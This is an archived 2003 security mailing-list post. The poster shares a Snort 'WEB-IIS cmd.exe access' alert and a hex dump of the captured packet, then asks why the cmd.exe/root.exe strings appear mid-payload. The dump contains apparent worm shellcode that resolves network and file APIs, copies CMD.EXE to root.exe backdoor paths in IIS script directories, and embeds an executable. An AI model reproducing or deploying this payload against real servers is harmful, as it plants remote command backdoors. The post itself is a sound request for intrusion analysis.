Hi, I saw this packet:

#(3 - 261684) [2003-05-09 19:43:00] [snort/1002] WEB-IIS cmd.exe access
IPv4: 194.204.X.X -> X.X.X.X
      hlen=5 TOS=0 dlen=1472 ID=57174 flags=0 offset=0 TTL=116 chksum=60435
TCP:  port=27761 -> dport: 80 flags=***A**** seq=915915841 ack=1210973630
      off=5 res=0 win=17184 urp=0 chksum=16151
Payload:  length = 1432

000 : FF 75 FC FF 55 F8 89 45 D8 E8 0F 00 00 00 47 6C .u..U..E......Gl
010 : 6F 62 61 6C 41 64 64 41 74 6F 6D 41 00 FF 75 FC obalAddAtomA..u.
020 : FF 55 F8 89 45 D4 E8 0C 00 00 00 43 6C 6F 73 65 .U..E......Close
030 : 48 61 6E 64 6C 65 00 FF 75 FC FF 55 F8 89 45 D0 Handle..u..U..E.
040 : E8 08 00 00 00 5F 6C 63 72 65 61 74 00 FF 75 FC ....._lcreat..u.
050 : FF 55 F8 89 45 CC E8 08 00 00 00 5F 6C 77 72 69 .U..E......_lwri
060 : 74 65 00 FF 75 FC FF 55 F8 89 45 C8 E8 08 00 00 te..u..U..E.....
070 : 00 5F 6C 63 6C 6F 73 65 00 FF 75 FC FF 55 F8 89 ._lclose..u..U..
080 : 45 C4 E8 0E 00 00 00 47 65 74 53 79 73 74 65 6D E......GetSystem
090 : 54 69 6D 65 00 FF 75 FC FF 55 F8 89 45 C0 E8 0B Time..u..U..E...
0a0 : 00 00 00 57 53 32 5F 33 32 2E 44 4C 4C 00 FF 55 ...WS2_32.DLL..U
0b0 : F4 89 45 BC E8 07 00 00 00 73 6F 63 6B 65 74 00 ..E......socket.
0c0 : FF 75 BC FF 55 F8 89 45 B8 E8 0C 00 00 00 63 6C .u..U..E......cl
0d0 : 6F 73 65 73 6F 63 6B 65 74 00 FF 75 BC FF 55 F8 osesocket..u..U.
0e0 : 89 45 B4 E8 0C 00 00 00 69 6F 63 74 6C 73 6F 63 .E......ioctlsoc
0f0 : 6B 65 74 00 FF 75 BC FF 55 F8 89 45 A4 E8 08 00 ket..u..U..E....
100 : 00 00 63 6F 6E 6E 65 63 74 00 FF 75 BC FF 55 F8 ..connect..u..U.
110 : 89 45 B0 E8 07 00 00 00 73 65 6C 65 63 74 00 FF .E......select..
120 : 75 BC FF 55 F8 89 45 A0 E8 05 00 00 00 73 65 6E u..U..E......sen
130 : 64 00 FF 75 BC FF 55 F8 89 45 AC E8 05 00 00 00 d..u..U..E......
140 : 72 65 63 76 00 FF 75 BC FF 55 F8 89 45 A8 E8 0C recv..u..U..E...
150 : 00 00 00 67 65 74 68 6F 73 74 6E 61 6D 65 00 FF ...gethostname..
160 : 75 BC FF 55 F8 89 45 9C E8 0E 00 00 00 67 65 74 u..U..E......get
170 : 68 6F 73 74 62 79 6E 61 6D 65 00 FF 75 BC FF 55 hostbyname..u..U
180 : F8 89 45 98 E8 10 00 00 00 57 53 41 47 65 74 4C ..E......WSAGetL
190 : 61 73 74 45 72 72 6F 72 00 FF 75 BC FF 55 F8 89 astError..u..U..
1a0 : 45 94 E8 0B 00 00 00 55 53 45 52 33 32 2E 44 4C E......USER32.DL
1b0 : 4C 00 FF 55 F4 89 45 90 E8 0E 00 00 00 45 78 69 L..U..E......Exi
1c0 : 74 57 69 6E 64 6F 77 73 45 78 00 FF 75 90 FF 55 tWindowsEx..u..U
1d0 : F8 89 45 8C C3 8B 45 84 69 C0 05 84 08 08 40 89 ..E...E.i.....@.
1e0 : 45 84 8D 84 04 78 56 34 12 F7 D8 C1 C0 08 C3 E8 E....xV4........
1f0 : E1 FF FF FF 3C 00 74 F7 3C FF 74 F3 C3 E8 ED FF ....<.t.<.t.....
200 : FF FF 8A F8 E8 E6 FF FF FF 8A D8 C1 E3 10 E8 DC ................
210 : FF FF FF 8A F8 E8 D5 FF FF FF 8A D8 E8 B4 FF FF ................
220 : FF 83 E0 07 E8 20 00 00 00 FF FF FF FF 00 FF FF ..... ..........
230 : FF 00 FF FF FF 00 FF FF FF 00 FF FF FF 00 00 FF ................
240 : FF 00 00 FF FF 00 00 FF FF 59 8B 04 81 23 D8 F7 .........Y...#..
250 : D0 23 85 58 FE FF FF 0B D8 80 FB 7F 74 9F 80 FB .#.X......t...
260 : E0 74 9A 3B 9D 58 FE FF FF 74 92 C3 68 04 01 00 .t.;.X...t..h...
270 : 00 8D 85 5C FE FF FF 50 FF 55 E0 8D BC 05 5C FE ...\...P.U....\.
280 : FF FF E8 09 00 00 00 5C 43 4D 44 2E 45 58 45 00 .......\CMD.EXE.
290 : 5E FC A5 A5 A4 B3 63 6A 01 E8 1C 00 00 00 64 3A ^.....cj......d:
2a0 : 5C 69 6E 65 74 70 75 62 5C 73 63 72 69 70 74 73 \inetpub\scripts
2b0 : 5C 72 6F 6F 74 2E 65 78 65 00 8B 0C 24 88 19 8D \root.exe...$...
2c0 : 85 5C FE FF FF 50 FF 55 DC 6A 01 E8 2B 00 00 00 .\...P.U.j..+...
2d0 : 64 3A 5C 70 72 6F 67 72 61 7E 31 5C 63 6F 6D 6D d:\progra~1\comm
2e0 : 6F 6E 7E 31 5C 73 79 73 74 65 6D 5C 4D 53 41 44 on~1\system\MSAD
2f0 : 43 5C 72 6F 6F 74 2E 65 78 65 00 8B 0C 24 88 19 C\root.exe...$..
300 : 8D 85 5C FE FF FF 50 FF 55 DC E8 BA 05 00 00 FC ..\...P.U.......
310 : 4D 5A 50 00 02 00 00 00 04 00 0F 00 FF FF 00 00 MZP.............
320 : B8 00 00 00 00 00 00 00 40 00 1A FC 00 00 01 FC ........@.......
330 : FC FC FC FC FC 00 00 50 45 00 00 4C 01 03 00 FD .......PE..L....
340 : 2A 25 29 00 00 00 00 00 00 00 00 E0 00 8F 81 0B *%).............
350 : 01 02 19 00 04 00 00 00 08 00 00 00 00 00 00 00 ................
360 : 10 00 00 00 10 00 00 00 20 00 00 00 00 40 00 00 ........ ....@..
370 : 10 00 00 00 04 00 00 01 00 00 00 00 00 00 00 03 ................
380 : 00 0A 00 00 00 00 00 00 40 00 00 00 04 00 00 00 ........@.......
390 : 00 00 00 02 00 00 00 00 00 10 00 00 20 00 00 00 ............ ...
3a0 : 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 ................
3b0 : 00 00 00 00 00 00 00 00 30 00 00 0C 01 FC FC FC ........0.......
3c0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
3d0 : 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 10 ................
3e0 : 00 00 00 04 00 00 00 08 00 00 00 00 00 00 00 00 ................
3f0 : 00 00 00 00 00 00 20 00 00 60 00 00 00 00 00 00 ...... ..`......
400 : 00 00 00 10 00 00 00 20 00 00 00 04 00 00 00 0C ....... ........
410 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 ..............@.
420 : 00 C0 00 00 00 00 00 00 00 00 00 10 00 00 00 30 ...............0
430 : 00 00 00 04 00 00 00 10 00 00 00 00 00 00 00 00 ................
440 : 00 00 00 00 00 00 40 00 00 C0 FC FC FC FC FC FC ......@.........
450 : FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................
460 : FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................
470 : FC FC FC FC FC FC 00 00 00 00 00 00 00 00 00 00 ................
480 : 00 00 00 00 00 00 68 04 01 00 00 68 D0 20 40 00 ......h....h. @.
490 : E8 61 01 00 00 8D B8 D0 20 40 00 BE 00 20 40 00 .a...... @... @.
4a0 : A5 A5 A5 A5 6A 01 68 D0 20 40 00 E8 4C 01 00 00 ....j.h. @..L...
4b0 : E8 0C 00 00 00 68 C0 27 09 00 E8 31 01 00 00 EB .....h.'...1....
4c0 : EF 68 D8 24 40 00 68 3F 00 0F 00 6A 00 68 10 20 .h.$@.h?...j.h.
4d0 : 40 00 68 02 00 00 80 E8 32 01 00 00 0B C0 75 26 @.h.....2.....u&
4e0 : 6A 04 68 54 20 40 00 6A 04 6A 00 68 48 20 40 00 j.hT @.j.j.hH @.
4f0 : FF 35 D8 24 40 00 E8 0D 01 00 00 FF 35 D8 24 40 .5.$@.......5.$@
500 : 00 E8 0E 01 00 00 68 D8 24 40 00 68 3F 00 0F 00 ......h.$@.h?...
510 : 6A 00 68 58 20 40 00 68 02 00 00 80 E8 ED 00 00 j.hX @.h........
520 : 00 0B C0 75 55 BD 9C 20 40 00 E8 4C 00 00 00 BD ...uU.. @..L....
530 : A8 20 40 00 E8 42 00 00 00 6A 09 68 B8 20 40 00 . @..B...j.h. @.
540 : 6A 01 6A 00 68 B0 20 40 00 FF 35 D8 24 40 00 E8 j.j.h. @..5.$@..
550 : B4 00 00 00 6A 09 68 C4 20 40 00 6A 01 6A 00 68 ....j.h. @.j.j.h
560 : B4 20 40 00 FF 35 D8 24 40 00 E8 99 00 00 00 FF . @..5.$@.......
570 : 35 D8 24 40 00 E8 9A 00 00 00 C3 C7 05 D0 24 40 5.$@..........$@
580 : 00 00 04 00 00 68 D0 24 40 00 68 D0 20 40 00 68 .....h.$@.h. @.h
590 : D4 24 40 00 6A 00 55 FF .$@.j.U.

What is strange is that the cmd.exe / root.exe stuff is halfway through, with some other code before it. The IP it hit was not mapped to anything (I believe it is unused), so this cannot have been part of another TCP conversation. Any ideas?

--
There should be a sig here, but it got bored and wandered off
This archive was generated by hypermail 2b30 : Fri May 30 2003 - 08:08:14 PDT